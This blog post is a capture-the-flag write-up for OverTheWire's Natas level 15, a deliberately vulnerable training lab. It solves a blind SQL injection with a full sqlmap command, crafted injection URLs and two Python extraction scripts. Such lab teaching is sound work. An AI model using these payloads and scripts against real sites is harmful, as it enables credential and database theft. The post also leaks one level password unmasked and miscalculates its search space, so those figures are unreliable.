<!DOCTYPE html>
<html>

  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <meta name="description" content="Blind leading the blind">

    <link rel="shortcut icon" href="/favicon.ico?" type="image/x-icon">
    <link rel="icon" href="/favicon.ico?" type="image/x-icon">
    <link rel="stylesheet" href="https://cdnjs.Cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" />
    <link rel="stylesheet" href="/assets/css/main.min.css ">
    <link rel="canonical" href="/2021/05/27/natas14-15/">
    <link rel="alternate" type="application/rss+xml" title="Caminek" href="/feed.xml ">
    
    <!-- Begin Jekyll SEO tag v2.7.1 -->
<title>Natas Level 14 → Level 15 | Caminek</title>
<meta name="generator" content="Jekyll v4.2.0" />
<meta property="og:title" content="Natas Level 14 → Level 15" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Blind leading the blind" />
<meta property="og:description" content="Blind leading the blind" />
<link rel="canonical" href="/2021/05/27/natas14-15/" />
<meta property="og:url" content="/2021/05/27/natas14-15/" />
<meta property="og:site_name" content="Caminek" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-05-27T13:53:10-04:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Natas Level 14 → Level 15" />
<script type="application/ld+json">
{"@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"/2021/05/27/natas14-15/"},"description":"Blind leading the blind","headline":"Natas Level 14 → Level 15","dateModified":"2021-05-27T13:53:10-04:00","url":"/2021/05/27/natas14-15/","datePublished":"2021-05-27T13:53:10-04:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->






  <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
      tex2jax: { inlineMath: [["$","$"],["\\(","\\)"]] },
      "HTML-CSS": {
        linebreaks: { automatic: true, width: "container" }
      }
  });
  </script>
  <script type="text/javascript"
    src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
  </script>

</head>


  <body>

    <header id="top">
    <div class="wrapper">
        
            <img src="/assets/img/misc/avatar.png" alt="site.icon" width="32" height="32" style="vertical-align:middle"/>
        
        <a href="/" class="brand">Caminek</a>
        <small></small>
        <button id="headerMenu" class="menu"><i class="fa fa-bars"></i></button>
        <nav id="headerNav">
            <ul>
                <li>
                    
                    <a href="/">
                    
                        <i class="fa fa-home"></i>Home
                    </a>
                </li>

                
                    
                    <li>
                        
                        <a href="/series/">
                        
                            <i class="fa fa-book"></i>Series
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/archive/">
                        
                            <i class="fa fa-archive"></i>Archives
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/category/">
                        
                            <i class="fa fa-th-list"></i>Categories
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/tag/">
                        
                            <i class="fa fa-tags"></i>Tags
                        </a>
                    </li>
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
            </ul>
        </nav>
    </div>
</header>


        <div class="page clearfix" index>
    <div class="left">
        <h1>Natas Level 14 → Level 15</h1>
        <div class="label">

            <div class="label-card">
                <i class="fa fa-calendar"></i> 2021-05-27
            </div>

            <div class="label-card">
                
            </div>

            <div class="label-card">
                
            </div>

            <div class="label-card">
            


<!-- <span class="point">•</span> -->
<span class="categories">
  <i class="fa fa-th-list"></i>
  
    
        <a href="/category/#ctf" title="Category: ctf" rel="category">ctf</a>&nbsp;
    
        <a href="/category/#wargames" title="Category: wargames" rel="category">wargames</a>&nbsp;
    
        <a href="/category/#web-security" title="Category: web-security" rel="category">web-security</a>
    
  

  <!-- <span class="point">•</span> -->
</span>


            </div>

            <div class="label-card">
            
<!-- <span class="point">•</span> -->
<span class="pageTag">
  <i class="fa fa-tags"></i>
  
    
        <!--a href="/tag/#wargames" title="Tag: wargames" rel="tag">wargames</a-->
        <a href="/tag/#wargames" title="Tag: wargames" rel="tag">wargames</a>&nbsp;
    
        <!--a href="/tag/#ctf" title="Tag: ctf" rel="tag">ctf</a-->
        <a href="/tag/#ctf" title="Tag: ctf" rel="tag">ctf</a>&nbsp;
    
        <!--a href="/tag/#overthewire" title="Tag: overthewire" rel="tag">overthewire</a-->
        <a href="/tag/#overthewire" title="Tag: overthewire" rel="tag">overthewire</a>&nbsp;
    
        <!--a href="/tag/#web-security" title="Tag: web-security" rel="tag">web-security</a-->
        <a href="/tag/#web-security" title="Tag: web-security" rel="tag">web-security</a>
    
  

</span>

            </div>

        </div>
        <hr>
        <article itemscope itemtype="http://schema.org/BlogPosting">
            <h2 id="level-goal">Level Goal</h2>
<p>Excluding the URL and username, the Level Goal section is blank for the Natas ctf.</p>

<h2 id="solution">Solution</h2>
<p>The natas15 site allows us to check for the existence of a user. It also provides a link to the source code.  Let’s take a look at that.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?</span>
<span class="cm">/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/</span>

<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"username"</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">))</span> <span class="p">{</span>
    <span class="nv">$link</span> <span class="o">=</span> <span class="nb">mysql_connect</span><span class="p">(</span><span class="s1">'localhost'</span><span class="p">,</span> <span class="s1">'natas15'</span><span class="p">,</span> <span class="s1">'&lt;censored&gt;'</span><span class="p">);</span>
    <span class="nb">mysql_select_db</span><span class="p">(</span><span class="s1">'natas15'</span><span class="p">,</span> <span class="nv">$link</span><span class="p">);</span>
    
    <span class="nv">$query</span> <span class="o">=</span> <span class="s2">"SELECT * from users where username=</span><span class="se">\"</span><span class="s2">"</span><span class="mf">.</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"username"</span><span class="p">]</span><span class="mf">.</span><span class="s2">"</span><span class="se">\"</span><span class="s2">"</span><span class="p">;</span>
    <span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"debug"</span><span class="p">,</span> <span class="nv">$_GET</span><span class="p">))</span> <span class="p">{</span>
        <span class="k">echo</span> <span class="s2">"Executing query: </span><span class="nv">$query</span><span class="s2">&lt;br&gt;"</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="nv">$res</span> <span class="o">=</span> <span class="nb">mysql_query</span><span class="p">(</span><span class="nv">$query</span><span class="p">,</span> <span class="nv">$link</span><span class="p">);</span>
    <span class="k">if</span><span class="p">(</span><span class="nv">$res</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span><span class="p">(</span><span class="nb">mysql_num_rows</span><span class="p">(</span><span class="nv">$res</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">echo</span> <span class="s2">"This user exists.&lt;br&gt;"</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="k">echo</span> <span class="s2">"This user doesn't exist.&lt;br&gt;"</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="k">echo</span> <span class="s2">"Error in query.&lt;br&gt;"</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="nb">mysql_close</span><span class="p">(</span><span class="nv">$link</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="cp">?&gt;</span> 
</code></pre></div></div>

<p>Here we have an SQL query that takes unsanitized inputs, like the previous level. Unlike the last level, the output of the database is not rendered to the webpage. We simply get generic messages as to whether or not the user exists. This tells us that we’ll need to perform a Blind SQL attack on the site.</p>

<p>A Blind SQL attack is used when the output of the database is not rendered to the webpage. The attack asks many true/false questions of the database and determines the answer to these questions based on the response from the database.</p>

<p>Looking at the code, we can see the two responses to any queries made: if query returns a result it outputs, “This user exists.” to the page, otherwise it outputs, “This user doesn’t exist.” to the page.</p>

<p>Here I’ll show two ways to get the next password. One uses <a href="https://sqlmap.org/">sqlmap</a>, a popular tool to perform the attack for you, the other is a Python script that shows what is really going on behind the scene in sqlmap. Both are valid ways to solve this problem.</p>

<p>You’ll need the supply the credentials to the current level for either solution. You may also wish to adjust the thread count.</p>

<h3 id="sqlmap">sqlmap</h3>
<p>The sqlmap tool is capable of a wide range of attacks and can be used to determine a lot of the information that is supplied below. Since we’re in the unique position of having the source code for the site, we can fill in a lot of this information without having to resort to teasing the information out of the site.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php" --auth-type=Basic --auth-cred=natas15:A------------------------------J --string="This user exists" --data="username=natas16" --level=3 --risk=1 --technique=B --threads=4 --dbms=MySQL -D natas15 -T users -C username,password --dump --batch
</code></pre></div></div>

<p>Here’s a breakdown of each option:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-u              URL
--auth-type     HTTP authentication
--auth-cred     HTTP authentication credentials (name:password)
--string        The site reponse to a TRUE condition
--data          Data string to be sent
--level         Number of checks to be performed. 
                Range is 1 to 5. Default is 1.
--risk          Types of payloads to use. Higher numbers could cause problems for the server. 
                Range is 1 to 3.  Default is 1.
--technique     B is for Blind
--threads       Max number of concurrent HTTP(s) requests
--dbms          DataBase Management System 
-D              Database name        
-T              Table name
-C              Column name(s)
--dump          Dump DBMS database table entries
--batch         Never ask for user input, use the default behaviour
</code></pre></div></div>

<p>The sqlmap tool will run for a couple minutes and will return with the username and password for all users on the server, including natas16. Use the natas16 password to access the next level.</p>

<h3 id="python-3-scripting">Python 3 scripting</h3>

<p>In a real-world situation, I’d use sqlmap. However, this is not a real-world situation. It’s a learning environment. As such, priority should be given to learning and not “winning.” That said, this section will not attempt to teach Python programming.</p>

<p>Before creating the script, we’ll need to get a few ideas under our belt first. Login to the site if you haven’t already and append the following to the URL:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>?username=natas16%22+and+password=+%22a&amp;debug
</code></pre></div></div>

<p>Using the debug option, we can see the query that was passed, along with the</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Executing query: SELECT * from users where username="natas16" and password= "a"
This user doesn't exist.
</code></pre></div></div>

<p>This tells us that the password for the user natas16 is not “a.” This should not come as much of a surprise. A better question would be to ask if the password contains at least one “a.” To do this we’ll need to use the LIKE operator. The wildcard character is the percent symbol. Let’s modify the previous query.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>?username=natas16%22+and+password+LIKE+%22%a%&amp;debug
</code></pre></div></div>

<p>Here’s the output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Executing query: SELECT * from users where username="natas16" and password LIKE "%a%"
This user exists.
</code></pre></div></div>

<p>This is certainly more helpful! Here we can see the password contains an “a.” Let’s see if it also contains an “A.”</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>?username=natas16%22+and+password+LIKE+%22%A%&amp;debug
</code></pre></div></div>

<p>Here’s the output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Executing query: SELECT * from users where username="natas16" and password LIKE "%A%"
This user exists.
</code></pre></div></div>

<p>While the output tells us that password contains an “A”, I can tell you with certainty that it does not. The reason we’re being told that there’s an “A” is because the query is case insensitive. To make the query case sensitive, we need to add BINARY to the query. Let’s modify our last search.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>?username=natas16%22+and+password+LIKE+BINARY+%22%A%&amp;debug
</code></pre></div></div>

<p>Now we see the “A” is not part of the password</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Executing query: SELECT * from users where username="natas16" and password LIKE BINARY "%A%"
This user doesn't exist.
</code></pre></div></div>

<p>Now that we can search for characters within the password, we can significantly speed up our search by only searching for characters known to be in the password. This will be the first part of both scripts.</p>

<p>If you look back on all the passwords for the Natas levels you’ll notice that they’re comprised of both upper- and lower-case characters, and digits for a combined character count of 62. There’s also 32 characters to each password. This makes the worst-case search space $32^{62} \approx 2.09 \times 10^{93}$. If we filter out the unused characters, we can shrink the worst-case search space to $32^{25} \approx 4.25 \times 10^{37}$. While not small, it’s a significant improvement.</p>

<p>After we have the filtered characters, we’ll need to discover the password using them.</p>

<p>To discover the password, we’ll need to try each character until we get a positive response from the server. What makes this different from the last queries is the placement of the wildcard. Instead of checking if there’s an “A” anywhere, we’ll ask if there’s a match for “A” followed by any other character.</p>

<p>Let’s search to see if the first character in the natas16 password is an “a.”</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>?username=natas16%22+and+password+LIKE+BINARY+%22a%&amp;debug
</code></pre></div></div>

<p>Now we see the “A” is not part of the password</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Executing query: SELECT * from users where username="natas16" and password LIKE BINARY "a%"
This user doesn't exist.
</code></pre></div></div>

<p>While before we were able to confirm that the password contains an “a”, it’s not the first character.</p>

<p>Let’s modify the search once again, this time with the first character of the password, a “W.”</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>?username=natas16%22+and+password+LIKE+BINARY+%22W%&amp;debug
</code></pre></div></div>

<p>Here we see that the password starts with a “W.” We can now stop searching for the first character and move on to the second character. Let’s see if the second character is an “a.”</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Executing query: SELECT * from users where username="natas16" and password LIKE BINARY "W%"
This user exists.
</code></pre></div></div>

<p>Let’s search to see if the second character in the natas16 password is an “a.”</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>?username=natas16%22+and+password+LIKE+BINARY+%22Wa%&amp;debug
</code></pre></div></div>

<p>Here we see the second character is an “a.”</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Executing query: SELECT * from users where username="natas16" and password LIKE BINARY "Wa%"
This user exists
</code></pre></div></div>

<p>You’d have to repeat this process 30 more times overall upper- and lower-case characters, and digits. This is a task best left to a script, especially given the length of the password.</p>

<p>Below are two scripts, one is single-threaded, the other multithreaded. The single-threaded script is easier to both read and write, but is slower as it waits for a response to each query before asking another.</p>

<p>The multithreaded script allows the computer to make multiple queries at the same time without having to wait for a response. While the results may be returned out of order, they will be displayed in order.</p>

<p>If you decide to run either script, you’ll need to edit the natas15_password variable to include the correct password for the current level. Do not edit the natas16_password variable!</p>

<h4 id="single-threaded">Single-threaded</h4>
<p>Script Performance</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Filtering characters completed in 16.1 seconds
Password search completed in 108.97 seconds

Completed in 125.07 seconds
</code></pre></div></div>

<p>Here’s the code:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python
</span><span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">string</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">from</span> <span class="nn">requests.auth</span> <span class="kn">import</span> <span class="n">HTTPBasicAuth</span>

<span class="n">start_script</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="n">all_chars</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">string</span><span class="p">.</span><span class="n">ascii_uppercase</span> <span class="o">+</span> <span class="n">string</span><span class="p">.</span><span class="n">ascii_lowercase</span> <span class="o">+</span> <span class="n">string</span><span class="p">.</span><span class="n">digits</span><span class="p">)</span>
<span class="n">natas15_password</span> <span class="o">=</span> <span class="s">"A------------------------------J"</span>  <span class="c1"># Password for the current level
</span><span class="n">natas16_password</span> <span class="o">=</span> <span class="s">""</span>  <span class="c1"># Buffer for the next level password
</span><span class="n">filtered_chars</span> <span class="o">=</span> <span class="s">""</span>


<span class="k">def</span> <span class="nf">filter_characters</span><span class="p">(</span><span class="n">char</span><span class="p">):</span>
    <span class="n">data</span> <span class="o">=</span> <span class="p">{</span><span class="s">'username'</span><span class="p">:</span> <span class="s">'natas16" and password LIKE BINARY "%'</span> <span class="o">+</span> <span class="n">char</span> <span class="o">+</span> <span class="s">'%" #'</span><span class="p">}</span>
    <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="s">'http://natas15.natas.labs.overthewire.org/index.php?debug'</span><span class="p">,</span>
                        <span class="n">auth</span><span class="o">=</span><span class="n">HTTPBasicAuth</span><span class="p">(</span><span class="s">'natas15'</span><span class="p">,</span> <span class="n">natas15_password</span><span class="p">),</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span>

    <span class="k">if</span> <span class="s">'exists'</span> <span class="ow">in</span> <span class="n">req</span><span class="p">.</span><span class="n">text</span><span class="p">:</span>
        <span class="k">return</span> <span class="n">char</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">return</span> <span class="bp">None</span>


<span class="n">start_filter</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">for</span> <span class="n">ac</span> <span class="ow">in</span> <span class="n">all_chars</span><span class="p">:</span>
    <span class="n">retval</span> <span class="o">=</span> <span class="n">filter_characters</span><span class="p">(</span><span class="n">ac</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">retval</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">retval</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s">''</span><span class="p">,</span> <span class="n">flush</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
        <span class="n">filtered_chars</span> <span class="o">=</span> <span class="n">filtered_chars</span> <span class="o">+</span> <span class="n">ac</span>

<span class="n">end_filter</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="se">\n</span><span class="s">Filtering characters completed in </span><span class="si">{</span><span class="nb">round</span><span class="p">(</span><span class="n">end_filter</span> <span class="o">-</span> <span class="n">start_filter</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span><span class="si">}</span><span class="s"> seconds'</span><span class="p">)</span>

<span class="n">start_password</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">32</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">fc</span> <span class="ow">in</span> <span class="n">filtered_chars</span><span class="p">:</span>
        <span class="n">data</span> <span class="o">=</span> <span class="p">{</span><span class="s">'username'</span><span class="p">:</span> <span class="s">'natas16" and password LIKE BINARY "'</span> <span class="o">+</span> <span class="n">natas16_password</span> <span class="o">+</span> <span class="n">fc</span> <span class="o">+</span> <span class="s">'%" #'</span><span class="p">}</span>
        <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="s">'http://natas15.natas.labs.overthewire.org/index.php?debug'</span><span class="p">,</span>
                            <span class="n">auth</span><span class="o">=</span><span class="n">HTTPBasicAuth</span><span class="p">(</span><span class="s">'natas15'</span><span class="p">,</span> <span class="n">natas15_password</span><span class="p">),</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span>
        <span class="k">if</span> <span class="s">'exists'</span> <span class="ow">in</span> <span class="n">req</span><span class="p">.</span><span class="n">text</span><span class="p">:</span>
            <span class="n">natas16_password</span> <span class="o">=</span> <span class="n">natas16_password</span> <span class="o">+</span> <span class="n">fc</span>
            <span class="k">print</span><span class="p">(</span><span class="n">fc</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s">''</span><span class="p">,</span> <span class="n">flush</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
            <span class="k">break</span>
<span class="n">end_password</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="se">\n</span><span class="s">Password search completed in </span><span class="si">{</span><span class="nb">round</span><span class="p">(</span><span class="n">end_password</span> <span class="o">-</span> <span class="n">start_password</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span><span class="si">}</span><span class="s"> seconds'</span><span class="p">)</span>

<span class="n">end_script</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="se">\n</span><span class="s">Completed in </span><span class="si">{</span><span class="nb">round</span><span class="p">(</span><span class="n">end_script</span> <span class="o">-</span> <span class="n">start_script</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span><span class="si">}</span><span class="s"> seconds'</span><span class="p">)</span>
</code></pre></div></div>

<h4 id="multithreaded">Multithreaded</h4>
<p>Script Performance</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Filtering characters completed in 2.38 seconds
Password search completed in 34.44 seconds

Completed in 36.81 seconds
</code></pre></div></div>

<p>Here’s the code:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python
</span><span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">string</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">from</span> <span class="nn">requests.auth</span> <span class="kn">import</span> <span class="n">HTTPBasicAuth</span>
<span class="kn">import</span> <span class="nn">concurrent.futures</span>

<span class="n">start_script</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="n">all_chars</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">string</span><span class="p">.</span><span class="n">ascii_uppercase</span> <span class="o">+</span> <span class="n">string</span><span class="p">.</span><span class="n">ascii_lowercase</span> <span class="o">+</span> <span class="n">string</span><span class="p">.</span><span class="n">digits</span><span class="p">)</span>
<span class="n">natas15_password</span> <span class="o">=</span> <span class="s">"AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J"</span>  <span class="c1"># Password for the current level
</span><span class="n">natas16_password</span> <span class="o">=</span> <span class="s">""</span>  <span class="c1"># Buffer for the next level password
</span><span class="n">filtered_chars</span> <span class="o">=</span> <span class="s">""</span>


<span class="k">def</span> <span class="nf">get_chars</span><span class="p">(</span><span class="n">char</span><span class="p">):</span>
    <span class="n">data</span> <span class="o">=</span> <span class="p">{</span><span class="s">'username'</span><span class="p">:</span> <span class="s">'natas16" and password LIKE BINARY "%'</span> <span class="o">+</span> <span class="n">char</span> <span class="o">+</span> <span class="s">'%" #'</span><span class="p">}</span>
    <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="s">'http://natas15.natas.labs.overthewire.org/index.php?debug'</span><span class="p">,</span>
                        <span class="n">auth</span><span class="o">=</span><span class="n">HTTPBasicAuth</span><span class="p">(</span><span class="s">'natas15'</span><span class="p">,</span> <span class="n">natas15_password</span><span class="p">),</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span>

    <span class="k">if</span> <span class="s">'exists'</span> <span class="ow">in</span> <span class="n">req</span><span class="p">.</span><span class="n">text</span><span class="p">:</span>
        <span class="k">return</span> <span class="n">char</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">return</span> <span class="bp">None</span>


<span class="n">start_filter</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">with</span> <span class="n">concurrent</span><span class="p">.</span><span class="n">futures</span><span class="p">.</span><span class="n">ThreadPoolExecutor</span><span class="p">()</span> <span class="k">as</span> <span class="n">executor</span><span class="p">:</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">executor</span><span class="p">.</span><span class="nb">map</span><span class="p">(</span><span class="n">get_chars</span><span class="p">,</span> <span class="n">all_chars</span><span class="p">)</span>

    <span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">result</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">r</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s">''</span><span class="p">,</span> <span class="n">flush</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
            <span class="n">filtered_chars</span> <span class="o">=</span> <span class="n">filtered_chars</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">r</span><span class="p">)</span>

<span class="n">end_filter</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="se">\n</span><span class="s">Filtering characters completed in </span><span class="si">{</span><span class="nb">round</span><span class="p">(</span><span class="n">end_filter</span> <span class="o">-</span> <span class="n">start_filter</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span><span class="si">}</span><span class="s"> seconds'</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">get_password</span><span class="p">(</span><span class="n">fc</span><span class="p">):</span>
    <span class="n">data</span> <span class="o">=</span> <span class="p">{</span><span class="s">'username'</span><span class="p">:</span> <span class="s">'natas16" and password LIKE BINARY "'</span> <span class="o">+</span> <span class="n">natas16_password</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">fc</span><span class="p">)</span> <span class="o">+</span> <span class="s">'%" #'</span><span class="p">}</span>
    <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="s">'http://natas15.natas.labs.overthewire.org/index.php?debug'</span><span class="p">,</span>
                        <span class="n">auth</span><span class="o">=</span><span class="n">HTTPBasicAuth</span><span class="p">(</span><span class="s">'natas15'</span><span class="p">,</span> <span class="n">natas15_password</span><span class="p">),</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span>

    <span class="k">if</span> <span class="s">'exists'</span> <span class="ow">in</span> <span class="n">req</span><span class="p">.</span><span class="n">text</span><span class="p">:</span>
        <span class="k">return</span> <span class="nb">str</span><span class="p">(</span><span class="n">fc</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">return</span> <span class="bp">None</span>


<span class="n">start_password</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">32</span><span class="p">):</span>
    <span class="k">with</span> <span class="n">concurrent</span><span class="p">.</span><span class="n">futures</span><span class="p">.</span><span class="n">ThreadPoolExecutor</span><span class="p">()</span> <span class="k">as</span> <span class="n">executor</span><span class="p">:</span>
        <span class="n">result</span> <span class="o">=</span> <span class="n">executor</span><span class="p">.</span><span class="nb">map</span><span class="p">(</span><span class="n">get_password</span><span class="p">,</span> <span class="n">filtered_chars</span><span class="p">)</span>

        <span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">result</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">r</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span>
                <span class="n">natas16_password</span> <span class="o">=</span> <span class="n">natas16_password</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">r</span><span class="p">)</span>
                <span class="k">print</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s">''</span><span class="p">,</span> <span class="n">flush</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>

<span class="n">end_password</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="se">\n</span><span class="s">Password search completed in </span><span class="si">{</span><span class="nb">round</span><span class="p">(</span><span class="n">end_password</span> <span class="o">-</span> <span class="n">start_password</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span><span class="si">}</span><span class="s"> seconds'</span><span class="p">)</span>

<span class="n">end_script</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="se">\n</span><span class="s">Completed in </span><span class="si">{</span><span class="nb">round</span><span class="p">(</span><span class="n">end_script</span> <span class="o">-</span> <span class="n">start_script</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span><span class="si">}</span><span class="s"> seconds'</span><span class="p">)</span>
</code></pre></div></div>

        </article>
        <hr>
        

        <div class="post-recent">
    <div class="pre" style="display:inline-block; margin-top: 20px;">
        
        <p><i class="fa fa-arrow-left"></i> <a href="/2021/05/27/natas13-14/">Natas Level 13 → Level 14</a></p>
        
    </div>
    <div class="nex" style="display:inline-block; margin-top: 20px; float:right;">
        
